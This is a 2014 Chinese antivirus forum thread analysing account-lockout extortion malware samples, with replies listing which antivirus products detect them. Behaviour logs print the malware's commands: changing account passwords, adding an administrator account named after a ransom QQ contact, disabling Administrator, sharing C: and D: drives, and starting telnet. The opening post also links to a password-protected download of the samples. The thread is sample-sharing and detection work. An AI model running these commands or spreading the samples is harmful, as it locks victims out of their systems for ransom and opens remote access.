敲竹杠，更新第四个，最狠的一个，进不去系统啊！！

显示全部楼层 · 发表于 2014-6-8 14:57:05

本帖最后由 Qutianshang 于 2014-6-8 20:16 编辑

动作好多
Msg ------ :  创建文件：C:\Documents and Settings\96852\Local Settings\Temporary Internet Files\Content.IE5\index.dat 【放行】
Msg ------ :  创建文件：C:\Documents and Settings\96852\Local Settings\Temporary Internet Files\Content.IE5\index.dat 【放行】
Msg ------ :  创建文件：C:\Documents and Settings\96852\Cookies\index.dat 【放行】
Msg ------ :  创建文件：C:\Documents and Settings\96852\Cookies\index.dat 【放行】
Msg ------ :  创建文件：C:\Documents and Settings\96852\Local Settings\History\History.IE5\index.dat 【放行】
Msg ------ :  创建文件：C:\Documents and Settings\96852\Local Settings\History\History.IE5\index.dat 【放行】
Msg ------ :  设置系统用户：想知道密码请联系QQ2844311551 【放行】
Msg ------ :  设置系统用户：hanhan 【放行】
Msg ------ :  重启系统：已禁止 --- 默认终止程序

ps：第二个
Msg ------ :  创建文件：C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat 【放行】
Msg ------ :  创建文件：C:\Documents and Settings\Administrator\Cookies\index.dat 【放行】
Msg ------ :  创建文件：C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat 【放行】
Msg ------ :  创建文件：C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\rasphone.pbk 【放行】
Msg ------ :  运行命令：net user Administrator /fullname:想知道密码请联系QQ843379988 【放行】
Msg ------ :  创建文件：\\.\MP110014 【放行】
Msg ------ :  运行命令：net user administrator mima1mima 【放行】
Msg ------ :  创建文件：C:\QQ.exe 【放行】
Msg ------ :  运行命令：C:\QQ.exe 【放行】
Msg ------ :  重启系统：已禁止 --- 默认终止程序

第四个。
调试线程已开启...
-----------------------
Msg ------ :  运行命令：net share huoji$=c:\  【放行】
Msg ------ :  创建文件：\\.\MP110014 【放行】
Msg ------ :  运行命令：net share huoji$=d:\  【放行】
Msg ------ :  运行命令：net start telnet 【放行】
Msg ------ :  运行命令：net start Server 【放行】
Msg ------ :  运行命令：net user 加QQ965569124要密码密码5845201314 /add 【放行】
Msg ------ :  运行命令：net user 加QQ965569124要密码 /active:yes 【放行】
Msg ------ :  运行命令：net localgroup Administrators 加QQ965569124要密码 /add 【放行】
Msg ------ :  运行命令：net user Administrator /active:no 【放行】
Msg ------ :  重启系统：已禁止 --- 默认终止程序

大家看一下这个密码！！！

附件抽风，更新了一下连接，四合一的连接链接：http://pan.baidu.com/s/1i3gLCpv  密码123

显示全部楼层 · 发表于 2014-6-8 19:20:33

Qutianshang 发表于 2014-6-8 19:12
他说进不去，要拿去重装了

无法直视的作者，停用帐户很好解决啊

顺便我的测试工具更新了，求顶

http://bbs.kafan.cn/thread-1717709-1-1.html

显示全部楼层 · 发表于 2014-6-8 14:58:45

本帖最后由 Dust-;羅錠于 2014-6-8 20:42 编辑

Dr.Web

LOLfz.exe - infected with Trojan.DownLoader10.35182
11.exe - infected with Trojan.Badur.45

To Dr.Web

[drweb.com #4771401]

显示全部楼层 · 发表于 2014-6-8 14:58:53

AddUser...

显示全部楼层 · 发表于 2014-6-8 15:08:31

avast杀了

显示全部楼层 · 发表于 2014-6-8 15:16:10

avast

显示全部楼层 · 发表于 2014-6-8 15:37:07

费尔

显示全部楼层 · 发表于 2014-6-8 15:46:38

bav启发1个
费尔杀掉另1个

显示全部楼层 · 发表于 2014-6-8 15:55:51

大蜘蛛杀了

显示全部楼层 · 发表于 2014-6-8 15:57:19

诺顿下载分析

显示全部楼层 · 发表于 2014-6-8 15:58:11

我又要调戏作者了～

[病毒样本] 敲竹杠，更新第四个，最狠的一个，进不去系统啊！！

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源